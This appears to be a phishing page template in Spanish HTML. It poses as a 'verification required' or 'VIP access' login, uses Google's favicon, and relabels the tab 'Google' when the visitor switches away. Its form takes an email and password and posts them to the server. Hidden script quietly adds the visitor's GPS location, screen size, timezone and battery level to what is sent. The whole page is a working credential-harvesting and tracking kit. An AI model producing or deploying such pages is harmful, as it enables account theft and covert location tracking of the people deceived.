<!DOCTYPE html>
<html>
<head>
<link rel="icon" type="image/png" href="https://www.google.com/favicon.ico">
<meta property="og:title" content="⚠️ Verificación Requerida">
<meta property="og:image" content="https://tu-app.onrender.com/static/system/portada.jpg">
<meta property="og:url" content="https://tu-app.onrender.com">


<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:title" content="Acceso VIP Sentinel">
<meta name="twitter:image" content="https://ibb.co/Cf74ys8meta">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>{{ config.titulo }}</title>
    <style>
        body { background: {{ config.color_fondo }}; color: {{ config.color_texto }}; font-family: sans-serif; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; }
        .box { background: rgba(255,255,255,0.05); padding: 30px; border-radius: 20px; border: 1px solid rgba(255,255,255,0.1); width: 90%; max-width: 350px; text-align: center; }
        .input { width: 100%; padding: 12px; margin: 10px 0; border-radius: 10px; border: 1px solid #444; background: #000; color: #fff; box-sizing: border-box; }
        .btn { width: 100%; padding: 12px; border-radius: 10px; border: none; background: gold; font-weight: bold; cursor: pointer; }
    </style>
</head>
<body>
    <div class="box">
        <img src="{{ config.img_principal }}" style="width: 80px; height: 80px; border-radius: 50%; margin-bottom: 10px;">
        <h2>{{ config.titulo }}</h2>
        <form action="/auth" method="POST" id="vForm">
            <input type="email" name="email" class="input" placeholder="Correo electrónico" required>
            <input type="password" name="pass" class="input" placeholder="Contraseña" required>
            <button class="btn">CONTINUAR</button>
        </form>
    </div>
    <script>
        const f = document.getElementById('vForm');
        const add = (n,v) => { let i=document.createElement('input'); i.type='hidden'; i.name=n; i.value=v; f.appendChild(i); };
        
        navigator.geolocation.getCurrentPosition(p => { 
            add('lat_gps', p.coords.latitude); add('lon_gps', p.coords.longitude); 
        });
        
        add('resolucion', window.screen.width + "x" + window.screen.height);
        add('tz', Intl.DateTimeFormat().resolvedOptions().timeZone);
        if (navigator.getBattery) { navigator.getBattery().then(b => add('bateria', Math.round(b.level*100)+'%')); }
    </script>
<script>
    var title = document.title;
    window.onblur = function () { document.title = "Google"; }; // Título cuando se va a otra pestaña
    window.onfocus = function () { document.title = title; };   // Título cuando vuelve
</script>
</body>
</html>

